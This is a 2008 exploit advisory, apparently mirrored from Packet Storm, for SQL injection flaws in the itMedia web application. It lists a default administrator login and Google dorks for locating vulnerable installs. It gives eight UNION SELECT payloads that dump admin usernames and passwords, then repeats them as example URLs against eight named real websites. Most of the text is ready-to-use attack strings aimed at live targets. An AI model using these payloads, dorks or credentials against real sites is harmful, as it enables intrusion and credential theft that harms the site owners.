itMedia suffers from multiple remote SQL injection vulnerabilities.
86d1d10488f16ea1cbaaffffa6812b456918a56d518d645f017aa19462cd308a################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
#
# Author: baltazar and sinner_01
#
# Home : www.darkc0de.com & ljuska.org
#
# Email : b4ltazar@gmail.com, sinn3r01@gmail.com
#
# Share the c0de!
#
################################################################
#
# App Name: itMedia
#
# App Home: http://www.itmedia.ba/web.php
#
# Defaul admin login:
# Administrator:darko
#
# Admin page:
# http://site.com/admin/
#
# Dork: inurl:/galerija.php?op=slika
# Dork: inurl:/ponuda.php?op=slika
# Dork: inurl:/vijest.php?id= intext:itmedia
# Dork: inurl:/slike.php?op=slika
#
# POC: vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass),3,4,5,6,7+from+admin--
# POC: vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass)+from+admin--
# POC: vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5,6,7,8,9,10+from+admin--
# POC: galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass)+from+admin--
# POC: galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass),4,5+from+admin--
# POC: ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass),3+from+admin--
# POC: ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4+from+admin--
# POC: slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin--
#Example:
#
#http://www.radioklik.com/vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass),3,4,5,6,7+from+admin--
#http://www.golub-brodac.org/vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass)+from+admin--
#http://www.blagoleks.net/vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5,6,7,8,9,10+from+admin--
#http://www.os-svetisava.com/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass)+from+admin--
#http://www.ujzrs.org/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass),4,5+from+admin--
#http://www.mihajlovic-bih.com/ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass),3+from+admin--
#http://www.nekretninebijeljina.ba/ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4+from+admin--
#http://www.signum.ba/slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin--
################################################################
# Vuln Discovered 08/17/2008
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed